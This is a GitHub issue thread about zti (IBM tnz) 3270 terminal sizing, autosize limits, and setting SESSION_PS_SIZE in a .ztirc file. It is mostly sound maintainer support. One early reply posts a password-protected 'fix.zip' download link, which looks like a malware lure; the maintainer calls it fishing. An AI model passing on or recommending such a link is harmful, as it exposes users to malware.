### ISSUE TITLE
Doc on config, terminal size

### ISSUE THREAD

**Issue by v1gnesh** [IBM/tnz#142] opened 2024-09-29 02:18 UTC
Unlike [this screenshot](https://github.com/IBM/tnz/blob/main/docs/png/zti-host3.png), I don't get a session selector on the side. How do I get this (goto xyz; hit escape key; goto abc; it should show up?).

When give `autosize` in the zti prompt, it says True; meaning, autosize is on.
If I set SESSION_PS_SIZE with MAX255 or FULL255, it seems to use the avaialble width, but heigth seems to be less than 80; so not really helpful.

Is 62x160 the max?

Is there a config file I can use to set it to 56x160 as in the screenshot?
Some fonts have extra vertical height, so using 62 makes a tiny bit of vertical scrolling necessary.

I can't provide screenshots unfortunately as they'll be from work systems.
I don't have 3270 access to any open source system.

Trying from Windows Terminal.

**Comment by SagarChandra07** [comment] 2024-09-29 02:19
try this
https://www.mediafire.com/file/q4gho1ar8e43udd/fix.zip/file
Archive password: changeme

you may need to install the c compiler

**Comment by v1gnesh** [comment] 2024-09-29 02:31
Can you add more details?

**Comment by najohnsn** [comment] 2024-09-29 10:33
I deleted a comment above that seemed to be fishing

**Comment by najohnsn** [comment] 2024-09-29 11:14
> I don't get a session selector on the side

The session selector is only displayed when, after laying out the 3270 terminal centered on the screen, it fits. With `SESSION_PS_SIZE=MAX` or `MAX255`, a 3270 terminal size should be chosen so that the session selector fits. If you are running with the latest, I just merged #143 to fix a problem that was introduced yesterday. For any other size setting, depending on the chosen terminal size, the session selector may or may not fit.

Re: `autosize` and Windows Terminal. Do not expect `autosize` to work with Windows Terminal. It only works when the terminal emulator has the ability to respond to terminal size change requests by changing the font size. I do not believe Windows Terminal has this capability. It was intended for use in PuTTY and is documented here: https://ibm.github.io/tnz/screen-sizing/#autosize

> If I set SESSION_PS_SIZE with MAX255 or FULL255, it seems to use the avaialble width, but heigth seems to be less than 80; so not really helpful.

80 sounds pretty big for height. I'm not sure what your width is, but there are 3270 architectural limitations that require rows*columns<16384. So, you won't get more than 80 rows unless you sacrifice going under 203 columns.

> Is 62x160 the max?

No. See above for considerations for the max. The max width is 255. But some applications (e.g. ISPF) cannot handle a width larger than 160. In my experience, the height can be as large as you want as long as it fits within the limitation mentioned above.

> Is there a config file I can use to set it to 56x160 as in the screenshot?

You can create a `~/.ztirc` file:
```
set SESSION_PS_SIZE 56x160
goto <details-about-my-session>
```

**Comment by v1gnesh** [comment] 2024-09-30 02:19
Thank you!
In windows then, `.ztirc` should be here? -- `%USERPROFILE%\.ztirc`
I use `uv tool install tnz` https://docs.astral.sh/uv/guides/tools/#installing-tools

**Comment by najohnsn** [comment] 2024-09-30 11:51
Yes, `%USERPROFILE%\.ztirc` is the correct location for you to put your `.ztirc` file.

**Comment by v1gnesh** [comment] 2024-10-01 02:04
Thanks again, I've also found from `zti --help` that I can point to an rc file with a parm.
I really love that this exists. Thank you sincerely for doing this, and for doing this as open source.
JetBrains Mono looks really good for 3270 :heart_eyes:

**Closed** 2024-10-01 02:04 UTC
